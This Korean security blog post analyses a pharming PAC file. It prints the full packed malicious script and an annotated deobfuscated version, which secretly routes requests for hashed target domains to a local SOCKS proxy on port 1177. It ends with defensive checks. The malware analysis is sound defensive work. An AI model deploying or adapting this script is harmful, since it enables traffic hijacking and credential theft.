[파밍] PAC를 이용한 악성코드 본문
PAC(프록시 자동 구성) 파일은 인터넷 또는 인트라넷에 대한 사용자 액세스를 제어하는 방법입니다. PAC 파일은 웹 브라우저가 요청된 콘텐츠를 검색하기 위해 ProxySG 어플라이언스를 사용해야 하는 시기와 사용 여부에 대한 지침을 포함하며, .pac 확장자가 있는 JavaScript 스크립트 파일입니다. 네트워크 관리자는 PAC 파일이 중앙에서 관리되며 업데이트가 쉽기 때문에 PAC 파일 사용을 즐겨합니다.
네트워크 상의 웹 서버에 이미 PAC 파일이 있는 경우 네트워크 상의 모든 클라이언트에 대한 이 파일의 URL을 웹 브라우저 구성에 추가합니다. PAC 파일 위치를 정의하면 웹 브라우저가 웹 요청 처리에 대한 프록시 구성 지침을 검색 및 다운로드할 수 있습니다. 바꿔 말하면, 이 URL을 가리키는 브라우저 설정이나 그 URL이 가리키는 파일 자체를 공격자가 바꿀 수 있으면 브라우저의 모든 웹 요청이 어디로 갈지를 공격자가 결정하게 되므로, PAC 설정은 무결성 관점에서 반드시 보호하고 주기적으로 점검해야 하는 항목입니다.
- 출처 : https://bto.bluecoat.com/webguides/proxysg/6.4/authentication_webguideko/Content/Topics/Authentication/Tasks/Browser/set_up_a_PAC_file_ta.htm
PAC 파일 내용
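// Packed PAC script as served to the victim. The outer function is Dean
// Edwards' "p,a,c,k,e,d" packer: `p` is the payload, `a` (62) the symbol base,
// `c` (198) the dictionary size and the '|'-separated string the dictionary;
// every base-62 token in the payload is replaced by its dictionary word and
// the resulting source is eval'd, which defines FindProxyForURL for the
// browser's PAC engine.
// The original is a single statement - a raw line break inside the string
// literal would be a syntax error - so the four lines the page showed it on
// are rejoined here (the joins fall inside 40-hex-digit hash words, e.g.
// ...d96bd + 8f...). To unpack it without executing it, replace the leading
// `eval(` with `console.log(` and read the output; the unpacked script (a
// renamed Paul Johnston sha1.js, the hashed host table `dowla` and
// FindProxyForURL) is listed further down this page.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('7 X=0;7 10="";7 h=8;g J(s){f P(r(A(s),s.l*h))}g 1w(s){f R(r(A(s),s.l*h))}g 1A(s){f O(r(A(s),s.l*h))}g 1y(p,o){f P(E(p,o))}g 1o(p,o){f R(E(p,o))}g 1p(p,o){f O(E(p,o))}g r(x,C){x[C>>5]|=1q<<(24-C%32);x[((C+1t>>9)<<4)+15]=C;7 w=B(1d);7 a=1s;7 b=-1M;7 c=-1N;7 d=1Q;7 e=-1O;q(7 i=0;i<x.l;i+=16){7 1h=a;7 19=b;7 18=c;7 1a=d;7 1c=e;q(7 j=0;j<1d;j++){u(j<16)w[j]=x[i+j];U w[j]=F(w[j-3]^w[j-8]^w[j-14]^w[j-16],1);7 t=m(m(F(a,5),1i(j,b,c,d)),m(m(e,w[j]),1m(j)));e=d;d=c;c=F(b,30);b=a;a=t}a=m(a,1h);b=m(b,19);c=m(c,18);d=m(d,1a);e=m(e,1c)}f B(a,b,c,d,e)}g 1g(s){f J(J(s)+\'1E\')}g 1i(t,b,c,d){u(t<20)f(b&c)|((~b)&d);u(t<1n)f b^c^d;u(t<1k)f(b&c)|(b&d)|(c&d);f b^c^d}g 1m(t){f(t<20)?1B:(t<1n)?1H:(t<1k)?-1I:-1F}g E(p,o){7 z=A(p);u(z.l>16)z=r(z,p.l*h);7 L=B(16),N=B(16);q(7 i=0;i<16;i++){L[i]=z[i]^1G;N[i]=z[i]^1R}7 13=r(L.12(A(o)),V+o.l*h);f r(N.12(13),V+1C)}g m(x,y){7 H=(x&G)+(y&G);7 Z=(x>>16)+(y>>16)+(H>>16);f(Z<<16)|(H&G)}g F(I,S){f(I<<S)|(I>>>(32-S))}g A(k){7 v=B();7 D=(1<<h)-1;q(7 i=0;i<k.l*h;i+=h)v[i>>5]|=(k.1D(i/h)&D)<<(32-h-i%32);f v}g O(v){7 k="";7 D=(1<<h)-1;q(7 i=0;i<v.l*32;i+=h)k+=1J.1P((v[i>>5]>>>(32-h-i%32))&D);f k}g P(n){7 Q=X?"1L":"1K";7 k="";q(7 i=0;i<n.l*4;i++){k+=Q.K((n[i>>2]>>((3-i%4)*8+4))&11)+Q.K((n[i>>2]>>((3-i%4)*8))&11)}f k}g R(n){7 W="1r+/";7 k="";q(7 i=0;i<n.l*4;i+=3){7 Y=(((n[i>>2]>>8*(3-i%4))&T)<<16)|(((n[i+1>>2]>>8*(3-(i+1)%4))&T)<<8)|((n[i+2>>2]>>8*(3-(i+2)%4))&T);q(7 j=0;j<4;j++){u(i*8+j*6>n.l*32)k+=10;U k+=W.K((Y>>6*(3-j))&1v)}}f k}7 1f={"1u":1,"1x":1,"1z":1,"33":1,"3a":1,"2D":1,"2C":1,"2F":1,"2Q":1,"2P":1,"2S":1,"2L":1,"2N":1,"2O":1,"2M":1,"2R":1,"2K":1,"2E":1,"2I":1,"2J":1,"2G":1,"2H":1,"2T":1,"36":1,"37":1,"34":1,"35":1,"3b":1,"38":1,"39":1,"2X":1,"2Y":1,"2W":1,"2Z":1,"31":1,"2V":1,"2U":1,"2B":1,"28":1,"29":1,"27":1,"25":1,"1l":1,"1e":1,"26":1,"2d":1,"2e":1,"2c":1,"2a":1,"2b":1,"23":1,"1V":1,"1W":1,"1U":1,"1S":1,"1T":1,"21":1,"22":1,"1Z":1,"1X":1,"1Y":1,"2f":1,"2u":1,"2v":1,"2t":1,"2r":1,"2s":1,"2z":1,"2A":1,"2y":1,"2w":1,"2x":1,"2q":1,"2j":1,"1l":1,"2k":1,"1e":1};7 1j="2i 2g.0.0.1:2h";7 17=\'2o;\';7 M=2p.M;g 2n(2l,1b){u(M.2m(1f,1g(1b))){f 1j}f 17}',62,198,'|||||||var||||||||return|function|chrsz|||str|length|safe_add|binarray|data|key|for|core_lwo|||if|bin||||bkey|str2binb|Array|len|mask|core_hmac_lwo|rol|0xFFFF|lsw|num|iil_lwo|charAt|ipad|hasOwnProperty|opad|binb2str|binb2iil|iil_tab|binb2b64|cnt|0xFF|else|512|tab|iilcase|triplet|msw|b64pad|0xF|concat|hash||||ekls|oldc|oldb|oldd|woal|olde|80|83f6975e027788645b4c00ef25b5146fed5565cc|dowla|i11_lwo|olda|lwo_ft|po|60|4607d2c35e6d42a625c7c257e830326fc62bbeec|lwo_kt|40|b64_hmac_lwo|str_hmac_lwo|0x80|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|1732584193|64|ea7921b63846854dd57dc9277e34528cce350fa9|0x3F|b64_lwo|6aab394dadb90fc44794cfe2d714353ed7a5a67b|iil_hmac_lwo|2680e7b2d5a8a5ea8226976fb4ae5a0ad4c850bc|str_lwo|1518500249|160|charCodeAt|666|899497514|0x36363636|1859775393|1894007588|String|0123456789abcdef|0123456789ABCDEF|271733879|1732584194|1009589776|fromCharCode|271733878|0x5C5C5C5C|eb3dfbb25f6dd9cbf0f8bcc3ae7fe9cc964ab3ac|a1e2039e224da695da6d6dc07a0f14932943d3bb|5632c05a94052c83d1ea4397f2c3a4fb0c893d78|060e7648d662c61309ced4d719b0c4576152e0cc|35c9d4425028a1e38c1432916325272d797e596c|8ca13f57362cabed97720663eeec034b5c08a563|90e8642d438675783fdcb7593ab6a77081cfc06d|622991a4c79f105b66dbd10cc0a6fed52e5573c4||8cfc181809a5617f770055febf322ca7336ff77a|41ebd4c955131afca0edaafd1f1e014b9fdfc08a|fc018a9fbaecd3ec83d3509d97211c908d96bd8f||9e2d1f20d59ad10525b2bfa16133b631235a5bce|cdc1682b4261dcedee3f61c5657d3a8dee887602|c67935d6691fd10eda8d3735457f94aa4f629f20|250fa0cc5a1c3ff8f87ad5d9843662e02ab87990|62c116033e335ca54eb1b91ec34ff8a7b0cc9130|cce84205242461e6cd8abfaf1adc91061eaa7745|a0ebe30141ebdfea55f06e7add9b1ffa5618d64a|93cd406ba7d35f7eda092a400f31bacd740d2953|943823bad8f9493912f1507b1102ddda8724c35e|cb6907b8735fad92a23328dfd1514a7678dd6d13|97ad578240d2775fc8bbed8a70d5014c2f654928|127|1177|SOCKS|a4fc7941e529eb9343317114033db7920daa571d|9960106a906fa9d49a8e77d2b98d91bcef3431c2|wkql|call|FindProxyForURL|DIRECT|Object|4ad6b1518d006a84317d0054ee3116d03ad824af|28efc704a3bb7b53309948b2986e80c1fecf8cd8|fdc93ff8035c20656262b4b061e9bbf320b46877|14fc47bdf41c0bfc4779731bf2377faff9a09579|f314482664afb023f55e5d948774635262d56db4|b8363cd02ee0d3592f4872d801740064bfd0f7c0|668288564781df3fab4d9a583664fa03b3e3553f|8aaf0a929a9ad04e43c683d1c0a34d21975f2e41|35f0543871bad332dd6db720ef4b23adebbd6ed8|cc57de159b4eb59a6cc2fdb6c01a25a93b2a5afa|2edace762f11f327490aa8f54100140bd6d4b1ba|2bff03165710de5a6257cae93f74cff63285228c|508574b72ac28ea9347913efca53da381c771976|5c6e13a24f5924ea94fc925c2a0b79e58cfcf6f7|7a81f7225a07a69cd5cd6d0d25b7c15be7df3a32|8309cba1fd1a04db8fdcfd448f5125f8feb81a7e|f79535944be8a5bc06c550fb9202d6b4949bca0d|f714be9fde26bafd920ff2e0371ec34822c6dd8a|c9af90cb6a002bc09e639b457fe1b7a233b8c478|4483a10b6e4689c5b6ff0e1c1d06af58ecb36e28|43d57158cdc613bc6924bfd33d93c1624a5151c6|52a59637b3b68118d736131855e9a0faafce3ca9|463c43b8bf3d105bd8b90f87a762a61b35f78975|cd84d7a39102ab785b01a0b61f60aa6c9b6fe6fe|c231c235325d44f91eb84234d9fcc2cb4ac0c92c|9f9c1e692cfb5eaf522dd0feeb307c677987d216|33859e317cf5b7d57ec77cbb82d8225e8080ae10|f5841e4dce904508cebfe600e27d37716ca8013c|dee9ca5e4b515c7be93873bfd8e4d20e67cd9cd8|21bd476019a74cea59ab61b5240ca9b9b7833af6|4e3a2aa7d8bfd826758df07d3e5d5de482ddd4f5|6099f666e7ea1fd15f8829eb68aaee53de5d0091|2efe868db374d7d4d044f369bab1392ed6cb12b9|52bec35d1a5c0ecd0af7c769a8a603304b469814|bbd39779cd1f0ec563c1d0548071bda66fb10aa7|595dc993cbebcf89e65dc5ea3cf159fca3523254||d34da09a9220b81a1432a27bf830112b792f265e||84ad28870cd9bea81a0ad2f08bece0ea14353069|b1484496f37a2376f8fdf2bb9b5c75c131032eb5|2efb211fd18dcbb380c357367fcbb14c5088c2a7|c9f5025cb48435b27b7bacef6fa5abb55767206d|c93594728bd0627b98331e7cc974dd2ce04d5a1a|ee394e88b6f93cf726d1ce9751d5e962cb465bf4|60c238f80fda6c2b363dceb48d015a0cadb26cc7|6c780b275734e4391562b3dfff5a7756633ba7a8|f742437e4725fcc0d2507ad80bb7e05ccff48fd6'.split('|'),0,{}))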
복호화된 PAC파일 내용
// Shared settings for the hash library that follows (Paul Johnston sha1.js
// layout with sha1 -> lwo and hex -> iil renamed).
var iilcase = 0,   // hex digit case used by binb2iil: 0 = lowercase table, else uppercase
    b64pad = "",   // character binb2b64 appends once the input bits run out ("" = no padding)
    chrsz = 8;     // bits consumed per input character by str2binb / binb2str
/**
 * Hex digest of the SHA-1 of string `s`.
 * `s.length * chrsz` is the message length in bits that core_lwo pads to.
 * @param {string} s
 * @returns {string} 40 hex digits (case chosen by `iilcase`)
 */
function iil_lwo(s) {
    var bitLength = s.length * chrsz;
    var digest = core_lwo(str2binb(s), bitLength);
    return binb2iil(digest)
}
/**
 * Base64 digest of the SHA-1 of string `s` (padded with `b64pad`).
 * @param {string} s
 * @returns {string}
 */
function b64_lwo(s) {
    var bitLength = s.length * chrsz;
    var digest = core_lwo(str2binb(s), bitLength);
    return binb2b64(digest)
}
/**
 * Raw (binary string) digest of the SHA-1 of string `s`, one char per `chrsz` bits.
 * @param {string} s
 * @returns {string}
 */
function str_lwo(s) {
    var bitLength = s.length * chrsz;
    var digest = core_lwo(str2binb(s), bitLength);
    return binb2str(digest)
}
/**
 * Hex-encoded HMAC-SHA1 of `data` under `key` (unused by FindProxyForURL).
 * @param {string} key
 * @param {string} data
 * @returns {string}
 */
function iil_hmac_lwo(key, data) {
    var mac = core_hmac_lwo(key, data);
    return binb2iil(mac)
}
/**
 * Base64-encoded HMAC-SHA1 of `data` under `key` (unused by FindProxyForURL).
 * @param {string} key
 * @param {string} data
 * @returns {string}
 */
function b64_hmac_lwo(key, data) {
    var mac = core_hmac_lwo(key, data);
    return binb2b64(mac)
}
/**
 * Raw binary-string HMAC-SHA1 of `data` under `key` (unused by FindProxyForURL).
 * @param {string} key
 * @param {string} data
 * @returns {string}
 */
function str_hmac_lwo(key, data) {
    var mac = core_hmac_lwo(key, data);
    return binb2str(mac)
}
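// Reconstructed from the packed blob above: the HTML extraction of this page
// treated the text from `i <` in core_lwo's outer loop up to `> 16` in
// core_hmac_lwo as a tag and dropped it, which swallowed the rest of core_lwo
// plus the whole of i11_lwo, lwo_ft and lwo_kt and left `i11_lwo` (used by
// FindProxyForURL) undefined in the listing. Functionally this is Paul
// Johnston's sha1.js with sha1 -> lwo and hex -> iil renamed.

/**
 * SHA-1 compression over a big-endian 32-bit word array.
 * @param {number[]} x   message words; padded IN PLACE (may be sparse - empty
 *                       slots read as undefined, which the bitwise operators treat as 0)
 * @param {number} len   message length in bits
 * @returns {number[]}   the five state words as signed int32
 */
function core_lwo(x, len) {
    // Append the 0x80 terminator, then store the bit length in the last word
    // of the final 512-bit block.
    x[len >> 5] |= 0x80 << (24 - len % 32);
    x[((len + 64 >> 9) << 4) + 15] = len;
    var w = Array(80);
    // SHA-1 initial state: 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0 as int32.
    var a = 1732584193;
    var b = -271733879;
    var c = -1732584194;
    var d = 271733878;
    var e = -1009589776;
    for (var i = 0; i < x.length; i += 16) {
        var olda = a;
        var oldb = b;
        var oldc = c;
        var oldd = d;
        var olde = e;
        for (var j = 0; j < 80; j++) {
            // Message schedule: 16 message words, then the rotated XOR expansion.
            if (j < 16) w[j] = x[i + j];
            else w[j] = rol(w[j - 3] ^ w[j - 8] ^ w[j - 14] ^ w[j - 16], 1);
            var t = safe_add(safe_add(rol(a, 5), lwo_ft(j, b, c, d)), safe_add(safe_add(e, w[j]), lwo_kt(j)));
            e = d;
            d = c;
            c = rol(b, 30);
            b = a;
            a = t
        }
        a = safe_add(a, olda);
        b = safe_add(b, oldb);
        c = safe_add(c, oldc);
        d = safe_add(d, oldd);
        e = safe_add(e, olde)
    }
    return Array(a, b, c, d, e)
}

/**
 * Host-name hash used by FindProxyForURL: hex(SHA-1(hex(SHA-1(s)) + "666")).
 * The fixed "666" suffix on the second round means the keys in `dowla` are not
 * plain SHA-1 values, presumably to defeat simple hash lookups; anyone trying
 * to recover the target list has to hash candidate host names with this
 * exact construction.
 * @param {string} s host name
 * @returns {string} 40 hex digits
 */
function i11_lwo(s) {
    return iil_lwo(iil_lwo(s) + '666')
}

// SHA-1 round function: Ch for t<20, Parity for t<40, Maj for t<60, Parity after.
function lwo_ft(t, b, c, d) {
    if (t < 20) return (b & c) | ((~b) & d);
    if (t < 40) return b ^ c ^ d;
    if (t < 60) return (b & c) | (b & d) | (c & d);
    return b ^ c ^ d
}

// SHA-1 round constants as signed int32: 0x5A827999, 0x6ED9EBA1, 0x8F1BBCDC, 0xCA62C1D6.
function lwo_kt(t) {
    return (t < 20) ? 1518500249 : (t < 40) ? 1859775393 : (t < 60) ? -1894007588 : -899497514
}

/**
 * HMAC-SHA1 of `data` under string `key` (RFC 2104, 64-byte block): keys longer
 * than 16 words are hashed first, then XORed with the ipad/opad constants.
 * Present in the library but not called by FindProxyForURL.
 * @param {string} key
 * @param {string} data
 * @returns {number[]} five-word digest
 */
function core_hmac_lwo(key, data) {
    var bkey = str2binb(key);
    if (bkey.length > 16) bkey = core_lwo(bkey, key.length * chrsz);
    var ipad = Array(16),
        opad = Array(16);
    for (var i = 0; i < 16; i++) {
        ipad[i] = bkey[i] ^ 0x36363636;
        opad[i] = bkey[i] ^ 0x5C5C5C5C
    }
    var hash = core_lwo(ipad.concat(str2binb(data)), 512 + data.length * chrsz);
    return core_lwo(opad.concat(hash), 512 + 160)
}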
/**
 * Adds two 32-bit integers with wraparound and returns the signed int32 sum.
 * The 16-bit halves are summed separately so no intermediate exceeds 2^32 and
 * nothing is lost to double precision.
 * @param {number} x
 * @param {number} y
 * @returns {number}
 */
function safe_add(x, y) {
    var low = (x & 0xFFFF) + (y & 0xFFFF);
    var carry = low >> 16;
    var high = (x >> 16) + (y >> 16) + carry;
    return (high << 16) | (low & 0xFFFF)
}
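/**
 * Rotate the 32-bit integer `num` left by `cnt` bits. Reconstructed from the
 * packed blob above - the page extraction ate the `<< cnt) | (num >` in the
 * middle of the expression, leaving an unparsable `num < >> (32 - cnt)`.
 * @param {number} num
 * @param {number} cnt 0..31
 * @returns {number} signed int32
 */
function rol(num, cnt) {
    return (num << cnt) | (num >>> (32 - cnt))
}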
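/**
 * Pack string `str` into an array of big-endian 32-bit words, `chrsz` bits per
 * character (char codes are masked to `chrsz` bits). Reconstructed from the
 * packed blob above; the extraction dropped `<< chrsz) - 1; for (...) bin[i >`.
 * @param {string} str
 * @returns {number[]} word array (empty for "")
 */
function str2binb(str) {
    var bin = Array();
    var mask = (1 << chrsz) - 1;
    for (var i = 0; i < str.length * chrsz; i += chrsz) bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (32 - chrsz - i % 32);
    return bin
}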
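/**
 * Inverse of str2binb: turn a big-endian word array back into a string of
 * `chrsz`-bit characters (every word yields 32/chrsz characters, trailing
 * zero bytes included). Reconstructed from the packed blob above; the
 * extraction dropped `<< chrsz) - 1; for (...) str += String.fromCharCode((bin[i >`.
 * @param {number[]} bin
 * @returns {string}
 */
function binb2str(bin) {
    var str = "";
    var mask = (1 << chrsz) - 1;
    for (var i = 0; i < bin.length * 32; i += chrsz) str += String.fromCharCode((bin[i >> 5] >>> (32 - chrsz - i % 32)) & mask);
    return str
}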
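/**
 * Hex-encode a big-endian word array, two digits per byte, using the
 * uppercase table when `iilcase` is truthy. Reconstructed from the packed
 * blob above; the extraction dropped `< binarray.length * 4; i++) { str += iil_tab.charAt((binarray[i >`.
 * @param {number[]} binarray
 * @returns {string} 8 hex digits per word
 */
function binb2iil(binarray) {
    var iil_tab = iilcase ? "0123456789ABCDEF" : "0123456789abcdef";
    var str = "";
    for (var i = 0; i < binarray.length * 4; i++) {
        str += iil_tab.charAt((binarray[i >> 2] >> ((3 - i % 4) * 8 + 4)) & 0xF) + iil_tab.charAt((binarray[i >> 2] >> ((3 - i % 4) * 8)) & 0xF)
    }
    return str
}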
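/**
 * Base64-encode a big-endian word array. Bytes are taken three at a time
 * (reads past the end yield 0); output positions beyond the input's bit
 * length get `b64pad` instead of a digit, so with b64pad = "" the result is
 * unpadded. Reconstructed from the packed blob above; the extraction dropped
 * `< binarray.length * 4; i += 3) { var triplet = (((binarray[i >`.
 * @param {number[]} binarray
 * @returns {string}
 */
function binb2b64(binarray) {
    var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    var str = "";
    for (var i = 0; i < binarray.length * 4; i += 3) {
        var triplet = (((binarray[i >> 2] >> 8 * (3 - i % 4)) & 0xFF) << 16) | (((binarray[i + 1 >> 2] >> 8 * (3 - (i + 1) % 4)) & 0xFF) << 8) | ((binarray[i + 2 >> 2] >> 8 * (3 - (i + 2) % 4)) & 0xFF);
        for (var j = 0; j < 4; j++) {
            if (i * 8 + j * 6 > binarray.length * 32) str += b64pad;
            else str += tab.charAt((triplet >> 6 * (3 - j)) & 0x3F)
        }
    }
    return str
}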
------ 해시된 파밍 대상 도메인 목록 (암호화가 아니라 SHA-1 이중 해시이므로 "복호화"는 불가능하고, 후보 도메인을 같은 방식으로 해시해 대조해야 원래 도메인을 확인할 수 있다) ------
// Target set consulted by FindProxyForURL. Each key is i11_lwo(host), i.e.
// hex(SHA-1(hex(SHA-1(host)) + "666")) of a host name the attacker wants to
// intercept (see `g 1g(s){f J(J(s)+'1E')}` in the packed blob, 1E = "666");
// the value 1 is a placeholder - only membership matters, and it is tested
// with hasOwnProperty.call so inherited Object keys never match.
// The hashes are one-way, so the real domains cannot be read off this list;
// to identify them, hash candidate host names with the same construction and
// compare. Two entries are repeated (4607d2c3... and 83f6975e... each appear
// twice); duplicate keys in an object literal are harmless for a membership test.
var dowla = {
"ea7921b63846854dd57dc9277e34528cce350fa9": 1,
"6aab394dadb90fc44794cfe2d714353ed7a5a67b": 1,
"2680e7b2d5a8a5ea8226976fb4ae5a0ad4c850bc": 1,
"84ad28870cd9bea81a0ad2f08bece0ea14353069": 1,
"6c780b275734e4391562b3dfff5a7756633ba7a8": 1,
"5c6e13a24f5924ea94fc925c2a0b79e58cfcf6f7": 1,
"508574b72ac28ea9347913efca53da381c771976": 1,
"8309cba1fd1a04db8fdcfd448f5125f8feb81a7e": 1,
"33859e317cf5b7d57ec77cbb82d8225e8080ae10": 1,
"9f9c1e692cfb5eaf522dd0feeb307c677987d216": 1,
"dee9ca5e4b515c7be93873bfd8e4d20e67cd9cd8": 1,
"52a59637b3b68118d736131855e9a0faafce3ca9": 1,
"cd84d7a39102ab785b01a0b61f60aa6c9b6fe6fe": 1,
"c231c235325d44f91eb84234d9fcc2cb4ac0c92c": 1,
"463c43b8bf3d105bd8b90f87a762a61b35f78975": 1,
"f5841e4dce904508cebfe600e27d37716ca8013c": 1,
"43d57158cdc613bc6924bfd33d93c1624a5151c6": 1,
"7a81f7225a07a69cd5cd6d0d25b7c15be7df3a32": 1,
"c9af90cb6a002bc09e639b457fe1b7a233b8c478": 1,
"4483a10b6e4689c5b6ff0e1c1d06af58ecb36e28": 1,
"f79535944be8a5bc06c550fb9202d6b4949bca0d": 1,
"f714be9fde26bafd920ff2e0371ec34822c6dd8a": 1,
"21bd476019a74cea59ab61b5240ca9b9b7833af6": 1,
"c9f5025cb48435b27b7bacef6fa5abb55767206d": 1,
"c93594728bd0627b98331e7cc974dd2ce04d5a1a": 1,
"b1484496f37a2376f8fdf2bb9b5c75c131032eb5": 1,
"2efb211fd18dcbb380c357367fcbb14c5088c2a7": 1,
"f742437e4725fcc0d2507ad80bb7e05ccff48fd6": 1,
"ee394e88b6f93cf726d1ce9751d5e962cb465bf4": 1,
"60c238f80fda6c2b363dceb48d015a0cadb26cc7": 1,
"52bec35d1a5c0ecd0af7c769a8a603304b469814": 1,
"bbd39779cd1f0ec563c1d0548071bda66fb10aa7": 1,
"2efe868db374d7d4d044f369bab1392ed6cb12b9": 1,
"595dc993cbebcf89e65dc5ea3cf159fca3523254": 1,
"d34da09a9220b81a1432a27bf830112b792f265e": 1,
"6099f666e7ea1fd15f8829eb68aaee53de5d0091": 1,
"4e3a2aa7d8bfd826758df07d3e5d5de482ddd4f5": 1,
"2bff03165710de5a6257cae93f74cff63285228c": 1,
"250fa0cc5a1c3ff8f87ad5d9843662e02ab87990": 1,
"62c116033e335ca54eb1b91ec34ff8a7b0cc9130": 1,
"c67935d6691fd10eda8d3735457f94aa4f629f20": 1,
"9e2d1f20d59ad10525b2bfa16133b631235a5bce": 1,
"4607d2c35e6d42a625c7c257e830326fc62bbeec": 1,
"83f6975e027788645b4c00ef25b5146fed5565cc": 1,
"cdc1682b4261dcedee3f61c5657d3a8dee887602": 1,
"943823bad8f9493912f1507b1102ddda8724c35e": 1,
"cb6907b8735fad92a23328dfd1514a7678dd6d13": 1,
"93cd406ba7d35f7eda092a400f31bacd740d2953": 1,
"cce84205242461e6cd8abfaf1adc91061eaa7745": 1,
"a0ebe30141ebdfea55f06e7add9b1ffa5618d64a": 1,
"fc018a9fbaecd3ec83d3509d97211c908d96bd8f": 1,
"060e7648d662c61309ced4d719b0c4576152e0cc": 1,
"35c9d4425028a1e38c1432916325272d797e596c": 1,
"5632c05a94052c83d1ea4397f2c3a4fb0c893d78": 1,
"eb3dfbb25f6dd9cbf0f8bcc3ae7fe9cc964ab3ac": 1,
"a1e2039e224da695da6d6dc07a0f14932943d3bb": 1,
"8cfc181809a5617f770055febf322ca7336ff77a": 1,
"41ebd4c955131afca0edaafd1f1e014b9fdfc08a": 1,
"622991a4c79f105b66dbd10cc0a6fed52e5573c4": 1,
"8ca13f57362cabed97720663eeec034b5c08a563": 1,
"90e8642d438675783fdcb7593ab6a77081cfc06d": 1,
"97ad578240d2775fc8bbed8a70d5014c2f654928": 1,
"f314482664afb023f55e5d948774635262d56db4": 1,
"b8363cd02ee0d3592f4872d801740064bfd0f7c0": 1,
"14fc47bdf41c0bfc4779731bf2377faff9a09579": 1,
"28efc704a3bb7b53309948b2986e80c1fecf8cd8": 1,
"fdc93ff8035c20656262b4b061e9bbf320b46877": 1,
"cc57de159b4eb59a6cc2fdb6c01a25a93b2a5afa": 1,
"2edace762f11f327490aa8f54100140bd6d4b1ba": 1,
"35f0543871bad332dd6db720ef4b23adebbd6ed8": 1,
"668288564781df3fab4d9a583664fa03b3e3553f": 1,
"8aaf0a929a9ad04e43c683d1c0a34d21975f2e41": 1,
"4ad6b1518d006a84317d0054ee3116d03ad824af": 1,
"a4fc7941e529eb9343317114033db7920daa571d": 1,
"4607d2c35e6d42a625c7c257e830326fc62bbeec": 1,
"9960106a906fa9d49a8e77d2b98d91bcef3431c2": 1,
"83f6975e027788645b4c00ef25b5146fed5565cc": 1
};
// Return values of FindProxyForURL. `po` sends a matched request to a SOCKS
// proxy on the loopback interface, port 1177 - a listener that some other
// component on the victim host must provide; this PAC file on its own cannot
// redirect anything. `ekls` is the normal, un-proxied path. `hasOwnProperty`
// is borrowed from Object.prototype so the lookup in `dowla` ignores
// inherited keys such as "constructor".
var po = "SOCKS 127.0.0.1:1177",
    ekls = 'DIRECT;',
    hasOwnProperty = Object.prototype.hasOwnProperty;
------ 파밍 유도 함수 (브라우저가 요청마다 호출하는 PAC 진입점 FindProxyForURL) ---------
/**
 * PAC entry point. Per the PAC convention the browser calls this for every
 * request with the full URL (`wkql`, unused here) and the host name (`woal`).
 * The host is hashed with i11_lwo and looked up as an own property of `dowla`:
 * a hit routes the request to the SOCKS proxy named by `po`
 * (127.0.0.1:1177); every other host goes DIRECT via `ekls`.
 * @param {string} wkql request URL
 * @param {string} woal request host name
 * @returns {string} PAC proxy directive
 */
function FindProxyForURL(wkql, woal) {
    var hashedHost = i11_lwo(woal);
    var isTarget = hasOwnProperty.call(dowla, hashedHost);
    return isTarget ? po : ekls
}
접속하려는 호스트명을 `i11_lwo(host)` = SHA-1(SHA-1(host)의 16진 문자열 + "666")로 이중 해시한 값이 `dowla` 목록에 있으면 브라우저는 그 요청을 로컬 SOCKS 프록시(127.0.0.1:1177)로 보내고, 그 외 도메인은 DIRECT로 정상 사이트에 접속한다. 즉 이 PAC 파일만으로는 파밍이 완성되지 않으며, 피해 PC의 1177 포트에서 대기하는 SOCKS 리스너(별도의 악성 컴포넌트)가 있어야 해당 트래픽이 파밍 사이트로 우회된다. 대상 도메인은 일방향 해시로만 저장되어 있어 목록에서 직접 복원할 수는 없고, 의심되는 도메인 후보를 같은 방식으로 해시해 대조해야 확인할 수 있다. 대응 시에는 브라우저·시스템의 자동 프록시 구성(PAC) URL 설정과 127.0.0.1:1177 리스너의 존재 여부를 함께 점검하는 것이 좋다.